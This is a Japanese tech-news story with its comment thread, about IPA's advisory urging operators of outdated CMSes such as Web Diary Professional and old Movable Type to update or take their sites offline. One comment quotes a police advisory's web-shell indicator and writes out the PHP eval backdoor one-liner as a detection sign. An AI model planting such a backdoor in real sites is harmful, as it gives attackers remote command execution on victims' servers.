パスワードを忘れた? アカウント作成
11122522 story
セキュリティ

IPA、脆弱性のあるCMSを使用しているサイトに対し閉鎖を含めた対策を呼びかけ 44

ストーリー by hylom
とはいえそうやって簡単に閉鎖できるものでもなさそう 部門より

IPA(情報処理推進機構)が、安全でないCMSを利用しているWebサイトに対し、脆弱性を付かれて改ざんされたり、ウイルスの拡散に悪用される可能性があるとして注意喚起を行っている。もしアップデートや製品の移行ができない場合はWebページの公開停止を求めるという、強い内容のものとなっている(IPA)。

とくに問題とされているのは「WDP(Web Diary Professional)」および「Movable Type」の古いバージョン。また、それ以外のCMSを使っている場合も古いバージョンであれば脆弱性が含まれる可能性があるので、最新バージョンにアップデートするよう推奨している。

背景には、危険な脆弱性を含む古いバージョンのCMSを利用しているにも関わらず、運営者と連絡が取れない、もしくは連絡しても脆弱性が解消しないWebサイトの存在がある。

この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。
  • Web Diary Professional (スコア:4, 参考になる)

    by Anonymous Coward on 2014年06月20日 17時45分 (#2624848)

    IPAのページで真っ先に挙げられている Web Diary Professional。こいつはひどい。
    これの配布ページに行くと、これが保守されていない脆弱性がある事実上放棄されたウェブアプリケーションであることは一言も書いていない。

    確かにウェブサイトのドキュメントルートまでさかのぼっていくと
    「サイト休止中です」「長い間メンテナンスできていません」「ほかのアプリケーションに移行してください」
    とあるけれども。それらのページに対する動線が、上記のページには基本的にない。
    「セキュリティの向上について」についても「余力があれば」としか書いておらず、なおかつほかの文章に埋没する形でしか書いていない。

    • by Anonymous Coward

      作者には保守をする義務や脆弱性を修正する義務なんか無いんですよねぇ
      利用にあたってそういう契約になっていないのですから

      自力でアップデートや移行ができない、したくない、探せない、
      脆弱性とは何かすらわかっていない(漢字が読めない輩すら居る)、
      そんな情報を定期的に入手する作業もしたくない、
      でもお金はびた一文と払いたくない・・・
      そんなわがまま身勝手な人が運営するサイトはとっとと閉鎖が正解
      踏み台にされて他人に迷惑を掛けたなら刑事罰に問うてもいいぐらい

  • by nemui4 (20313) on 2014年06月20日 15時42分 (#2624750) 日記

    すると何故か逆切れされて訴えられてしまう話をよく聞きますね。

    >背景には、危険な脆弱性を含む古いバージョンのCMSを利用しているにも関わらず、運営者と連絡が取れない、もしくは連絡しても脆弱性が解消しないWebサイトの存在がある。

    脆弱なところっておそらくサイトを構築した人か管理者がそれを知らないからそうなったのであって
    それでなくても日々忙しいのに今までだ丈夫だったからそんなのしばらくほおって置いてもいいだろ
    ってな感じで対応先延ばしにしてそう。

    IPAからの注意喚起でもだめだと実害が出るまできっと対応しないと思う。

    • by hirano (13505) on 2014年06月20日 17時10分 (#2624825) ホームページ

      園芸の話にしてみました。園芸趣味のA氏と、セキュリティ担当通行人S氏
      A:「今年もバラが立派に咲いたなあ」
      S:「おやAさん立派なバラですね」
      A:「そうでしょう。今年は色もいいんです」
      S:「おっとその花壇は園芸管理システムWDPのバージョン4.72ではないか!これは問題ですよ」
      A:「何を言うんですか、バラは誰にも迷惑をかけてない。一日に訪問者も1000人は来てる」
      S:「古い園芸管理システムは、その花壇を踏み台にして野ネズミが隣の畑に行って荒らすんです」
      A:「そりゃネズミが悪い。私のせいじゃない」
      S:「今すぐ別の花壇 WDP後継freoに植え替えるか、花壇を閉鎖してもらわなきゃ」
      A:「バカな事を。植え替えるだけでも一日仕事だ。」
      ...以下しばらくもめて、結局警察が乗り出して花壇は閉鎖。 
      (こんな感じ? サイト運営者に少し同情するけど、
      「製品の移行ができない場合はWebページの公開停止を求め」も、やむを得ないかな。)

      親コメント
      • by Anonymous Coward on 2014年06月20日 17時18分 (#2624829)

        > A:「そりゃネズミが悪い。私のせいじゃない」

        ここがポイントだよなぁ。

        そりゃあ悪いのはネズミなんだけど、ネズミに言葉は通じないから、
        花壇の管理者にネズミ対策をしてもらわないと困る。
        それができるのは、花壇の管理者だけなのだから。

        ネズミ男とかネズミ小僧とかにも、きっと言葉は届かないだろう……。

        親コメント
        • by Anonymous Coward

          例えば空き家とか、鍵が壊れたまま放置しておくと警察から連絡ありそう。
          放置しないよう条例とかも出来てるらしい。
          放置され踏み台にされてるサーバが増える様だと「防犯」が求められるようになるかもね。

    • by Anonymous Coward on 2014年06月20日 15時45分 (#2624753)

      まずはIPAが対象のサイトの一覧を公開することだね。
      そうすれば、攻撃者がそのリストを元に攻撃を仕掛ける。
      結果、閉鎖へ。

      親コメント
    • by Anonymous Coward

      IPAからの注意喚起でもだめだと実害が出るまできっと対応しないと思う。

      同感。
      注意しても対応しなかったら強制排除ってできませんかね。IPアドレスの登録を解除しちゃうとか。
      強引すぎるかな?
      #あと、誰(どこ)がどういう権限で切るかという問題もあるか。

      • by nemui4 (20313) on 2014年06月20日 16時09分 (#2624775) 日記

        警察関係だと実害が出て被害者から届け出が出ないと動かないだろうし、なんらかの法整備が必要だとしても法曹界はこの分野には及び腰っぽいからもっと動かないだろうなぁ。

        脆弱性を放置したサーバー群が全てボット化してしまい大勢の被害者が出てからだと遅すぎるから、
        やっぱり今回の注意喚起で脆弱性を直せないならなんとか公開停止させて無害化しておくのが良いですね。

        親コメント
      • by Anonymous Coward
        ドメインレジストラやプロバイダの契約段階でそういった要項を盛り込んでおくとか?
        変な使われ方されたら嫌だけど。
  • by Anonymous Coward on 2014年06月20日 16時37分 (#2624797)

    >1.PHPで作成されている。
    >2.PHPプログラムに(cmdの部分が異なる場合がある。)と記載されている部分がある。
    >3.PHPプログラムをブラウザで動作させるとパスワードの入力を求められ、犯罪者だけがウイルスを動作できるように制限されている場合がある。​​
    http://www.police.pref.osaka.jp/15topics/nisesite_teguchi_1.html [osaka.jp]

    もっと詳細はないのかな。

    • by Anonymous Coward

      >2.PHPプログラムに<?php @eval($_POST[’cmd’];?>(cmdの部分が異なる場合がある。)と記載されている部分がある。
      消えちゃったので全角にしました。

  • by Anonymous Coward on 2014年06月20日 16時06分 (#2624772)

    意外と、アップデートが遅いので注意、、

  • って思ってるんじゃないの某OSの時みたいに

  • by Anonymous Coward on 2014年06月20日 15時47分 (#2624754)

    どんな権限あれば他人のサイトに公開停止することができるのか
    一生懸命頑張ってやっと構築したサイトだっていっぱいあるだろうに。。。

    • Re:公開停止って (スコア:3, すばらしい洞察)

      by Anonymous Coward on 2014年06月20日 16時02分 (#2624766)
      手作りして公道走行許可を得た乗り物に欠陥が見つかり指摘された時「一所懸命頑張ってやっと創ったんだからそのまま走る。」ってダダこねるってのはどう思う?
      もちろんウエブサイトは人身事故を起こすものではないけど、加害者側に回る可能性があるという点は似てる。
      #他人に害を及ぼす(かもしれない)頑張りなんて本人以外には価値ないと思う。
      親コメント
    • by Anonymous Coward on 2014年06月20日 15時52分 (#2624760)

      そのサイトが被害者から加害者になったときかな。だからIPAは積極的にそのサイトから被害を受けるような施策をすべきか

      親コメント
    • by nemui4 (20313) on 2014年06月20日 16時10分 (#2624777) 日記

      一生懸命頑張ってやっと構築したサイトを公開停止されたら、一生懸命頑張ってやっと脆弱性対策してくれるんじゃないすかね。

      親コメント
    • by Anonymous Coward on 2014年06月20日 17時17分 (#2624827)

      >どんな権限あれば他人のサイトに公開停止することができるのか
      日本国憲法12条ですかね。
      http://ja.wikipedia.org/wiki/%E6%97%A5%E6%9C%AC%E5%9B%BD%E6%86%B2%E6%B... [wikipedia.org]

      親コメント
      • by Anonymous Coward

        どっちかというと13条の「公共の福祉に反しない限り」の部分じゃないのかなぁ?
        http://ja.wikipedia.org/wiki/%E6%97%A5%E6%9C%AC%E5%9B%BD%E6%86%B2%E6%B... [wikipedia.org]

        そういうサイトを放置することで他人の財産権を侵害する(=公共の福祉に反する)可能性がある、だから公開停止させる(=自由権を制限)ことができるってことじゃないかね。
        むろん、具体的な立法処置が要るんだろうけど。

    • by Anonymous Coward

      一生懸命な無能者の仕事ですか…

      • by Anonymous Coward

        ゼークトさん曰く「無能な働き者。これは(略」

    • by Anonymous Coward
      踏み台にされることによる被害の拡散が笑い事でなくなってきたし
      そのうち法規制されてお墨付きになるかもね。
    • by Anonymous Coward

      「一生懸命頑張ってやっと」の奴が公開サーバなんて立てるなよ…

      • by Anonymous Coward

        ヤットさんの悪口はそこまでだ!

      • by Anonymous Coward

        その手の奴は停止でなく移行についても「頑張ってやっと覚えたのに、今から新しい物に移行したくない」と言って、何も進まないからどうしようもない。
        無能な頑張り者はまじ有害。

    • by Anonymous Coward

      どんな権限あれば他人のサイトに公開停止することができるのか
      一生懸命頑張ってやっと構築したサイトだっていっぱいあるだろうに。。。

      こういった考え方を正しく脆弱性と言います……

    • by Anonymous Coward

      巫女SEに連絡すれば停止してくれるのではないか
      巫女SE、脆弱性のあるサービスを独断で停止し、あわや警察沙汰に [srad.jp]

    • by Anonymous Coward

      で?っていう

  • by Anonymous Coward on 2014年06月20日 16時18分 (#2624782)

    あくまでの自分の経験側ではあるけど
    アップデートしてくださいだけだと動かないけど、こういう風にするとセキュリティが向上しますというとやってくれるところもあったりするので

    対策しろ、出来なければ閉鎖しろ

    というよりはいくつかの策を提示するほうが対応率が上がるような気がしないでもない。

    • by Anonymous Coward on 2014年06月20日 16時25分 (#2624786)

      親切に説明するフリをしてマルウエアを仕込ませる偽IPAが出現しそうで怖ひ

      #考え過ぎ?

      親コメント
    • by Anonymous Coward

      こういう風にすると、っていう内容がアップデートなんですよね?
      いくつかの策といってもアップデート以外ないのでは?

      アップデート以外に別途何かサーバーの設定変更等必要であるならわかるけど。

    • by Anonymous Coward

      更新、以降、閉鎖と3つの策を提示してくれているじゃないですか(ぇ

      IPAの業務範囲としては、個々の製品について提示していたらきりがない気もします。
      MTは(普通に使っていれば)とりあえず管理画面を閉じればいいんですけどね。

  • by Anonymous Coward on 2014年06月20日 16時44分 (#2624803)
    HTML を直書きしている私に死角は無かった。

    # 無いのは死角じゃなくて資格かも知れない…
    • by prankster (12979) on 2014年06月20日 16時54分 (#2624810)
      仲間発見。嬉しい。
      ちなみに使っているのはJedit XというエディタとJChecker XというHTMLエディット用プラグインの組み合わせです。
      元々エディタで書いていたのですが、ホームページビルダーを試しに使ってみて死にそうに汚いコードに絶望し、直書きに戻りました。
      # 自分のページの構築はエディタで充分。
      親コメント
      • by help (36022) on 2014年06月20日 18時40分 (#2624880) 日記
        私も直書きです。
        というか、限られたタグしかつかいませんので、 Windows のメモ帳で十分です。
        親コメント
      • by Anonymous Coward
        >Jedit XというエディタとJChecker X

        ひゃあ。Mac OS 8.5あたりの頃にオレも毎日使ってたなあ(“X”は付いてなかったけど)。
        まだあるんですね!
  • 一時しのぎにCMS自体を止めることはできる。

    • by Anonymous Coward

      MovableTypeはよく知らないけど、「スタティックパブリッシング」ってのがそれじゃないの?

      • by Anonymous Coward

        それです。

        あと、「公開キュー」はバッチをcronなりに設定していれば静的ファイルをバックグラウンド生成します。
        『今でも』MTは静的生成が基本です。

    • by Anonymous Coward

      wget でサイトまるごとダウンロードするとかじゃだめですか?

      とりあえず、全部静的なファイルになりまっせ。

    • by Anonymous Coward

      Cgi-binにパーミッション設定してるけどだめかな。
      どうせコメントもトラックバックもスパムしかこないし。

  • バージョンが分からないようにすれば、すこしだけ被害の確率が下がるじゃん。

    • by Anonymous Coward

      そうか、バージョンを偽装・・・(げふんげふん

typodupeerror

未知のハックに一心不乱に取り組んだ結果、私は自然の法則を変えてしまった -- あるハッカー

読み込み中...